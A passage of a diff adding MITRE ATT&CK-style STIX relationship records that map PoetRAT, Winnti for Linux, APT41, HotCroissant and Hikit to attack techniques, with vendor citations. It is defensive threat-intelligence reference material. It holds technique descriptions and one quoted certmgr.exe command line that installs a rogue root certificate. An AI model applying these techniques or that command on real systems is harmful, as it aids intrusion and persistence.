+ "id": "relationship--34e9fc0a-75b9-4100-91ef-30ca3225958a",
+ "type": "relationship",
+ "modified": "2020-04-29T22:19:36.091Z",
+ "created": "2020-04-29T22:01:48.138Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--64f0efcd-e46a-4bcf-9cbe-4c890e13c01b",
+ "type": "relationship",
+ "modified": "2020-04-30T13:00:53.416Z",
+ "created": "2020-04-30T13:00:53.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) can encode its configuration file with single-byte XOR encoding.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7dfa8cdd-102c-4ea6-9fe0-d2e76b688221",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.101Z",
+ "created": "2020-04-30T15:51:59.672Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has decoded XOR encoded strings holding its configuration upon execution.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45e9de66-7203-48e9-bd9b-096c289f35db",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.165Z",
+ "created": "2020-04-30T15:51:59.690Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. (Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--90925137-7ffe-46d6-82d4-0ad7748740a3",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.163Z",
+ "created": "2020-04-30T15:51:59.718Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c85d86c0-8adc-42fc-b7c9-8ca33d9ac4b6",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.169Z",
+ "created": "2020-04-30T15:51:59.722Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--40622bce-ea51-4744-9240-4a4c4bf83753",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.167Z",
+ "created": "2020-04-30T16:48:25.685Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2fc3c031-8a39-4bc9-b3e1-4c5f6ac1e292",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.171Z",
+ "created": "2020-04-30T16:48:25.687Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Talos PoetRAT April 2020",
+ "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020."
+ }
+ ],
+ "description": "[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list files upon receiving the ls command from C2.(Citation: Talos PoetRAT April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2bcaf336-cd02-47e3-b73f-6f0c5cc3592f",
+ "type": "relationship",
+ "modified": "2020-04-30T17:08:59.317Z",
+ "created": "2020-04-30T17:08:59.317Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--670d65e8-59a9-46ae-bdb6-6cb94a0528ba",
+ "type": "relationship",
+ "modified": "2020-05-04T14:24:55.161Z",
+ "created": "2020-04-30T18:39:20.146Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d",
+ "type": "relationship",
+ "modified": "2020-05-01T15:05:46.940Z",
+ "created": "2020-04-30T20:31:37.999Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca",
+ "type": "relationship",
+ "modified": "2020-04-30T20:31:38.012Z",
+ "created": "2020-04-30T20:31:38.012Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a Cobalt Strike BEACON loader.(Citation: FireEye APT41 March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3",
+ "type": "relationship",
+ "modified": "2020-05-01T14:48:37.136Z",
+ "created": "2020-05-01T13:57:23.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 March 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150",
+ "type": "relationship",
+ "modified": "2020-05-01T13:57:23.349Z",
+ "created": "2020-05-01T13:57:23.349Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+ "external_references": [
+ {
+ "source_name": "FireEye APT41 Aug 2019",
+ "url": "https://content.fireeye.com/apt-41/rpt-apt41",
+ "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019."
+ }
+ ],
+ "description": "(Citation: FireEye APT41 Aug 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--66d42126-d337-4a00-ae35-d8af7203a6eb",
+ "type": "relationship",
+ "modified": "2020-05-01T14:48:36.806Z",
+ "created": "2020-05-01T14:48:36.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has attempted to install a scheduled task named \u201cJava Maintenance64\u201d on startup to establish persistence.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--fa7381ff-f2b8-4878-a9a0-10a703c7a5dd",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.554Z",
+ "created": "2020-05-01T20:05:15.991Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--74f14668-7111-4f96-a307-4aac00d91cf4",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.556Z",
+ "created": "2020-05-01T20:05:16.006Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has encrypted strings with single-byte XOR and base64 encoded RC4.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c12c331c-67dd-40be-b2ad-a198c0b92e78",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.557Z",
+ "created": "2020-05-01T20:05:15.997Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ },
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--30da2329-c7ee-4ac9-a38d-af79e6c1389c",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.586Z",
+ "created": "2020-05-01T20:32:56.617Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--95047f03-4811-4300-922e-1ba937d53a61",
+ "target_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839",
+ "external_references": [
+ {
+ "source_name": "FireEye HIKIT Rootkit Part 2",
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020."
+ }
+ ],
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) uses certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root and certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.(Citation: FireEye HIKIT Rootkit Part 2)",
+ "relationship_type": "uses",
+ "id": "relationship--9a78f409-0f6b-41fd-a18f-f38366e4703e",
+ "type": "relationship",
+ "modified": "2020-05-13T20:36:49.341Z",
+ "created": "2020-05-04T14:56:53.094Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) can perform dynamic DLL importing and API lookups using LoadLibrary and GetProcAddress on obfuscated strings.(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7066827b-795c-447c-9c07-05765ed1e07b",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.199Z",
+ "created": "2020-05-04T19:13:35.383Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim\u2019s machine.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--45310a29-78b6-4863-ab0b-49fd53ef1809",
+ "type": "relationship",
+ "modified": "2020-05-06T19:28:22.178Z",
+ "created": "2020-05-04T19:13:35.449Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) can remotely open applications on the infected host with the ShellExecuteA command.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--98fd9ed1-abf3-4e2f-b071-8aea2dc44a64",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.457Z",
+ "created": "2020-05-04T19:13:35.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to list the names of all open windows on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c8a01e1c-dac0-4a47-bda3-3b5684bd3d47",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.459Z",
+ "created": "2020-05-04T19:13:35.459Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e3542e4e-6c4d-468a-b11e-462e35dc33f6",
+ "type": "relationship",
+ "modified": "2020-05-05T15:33:17.970Z",
+ "created": "2020-05-04T19:13:35.462Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) can retrieve a list of applications from the SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths registry key.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d07460c8-0d13-4c25-81f7-56e5198f07c5",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.466Z",
+ "created": "2020-05-04T19:13:35.466Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--92e19c14-504e-402f-b755-08358333cda0",
+ "type": "relationship",
+ "modified": "2020-05-04T19:13:35.475Z",
+ "created": "2020-05-04T19:13:35.474Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
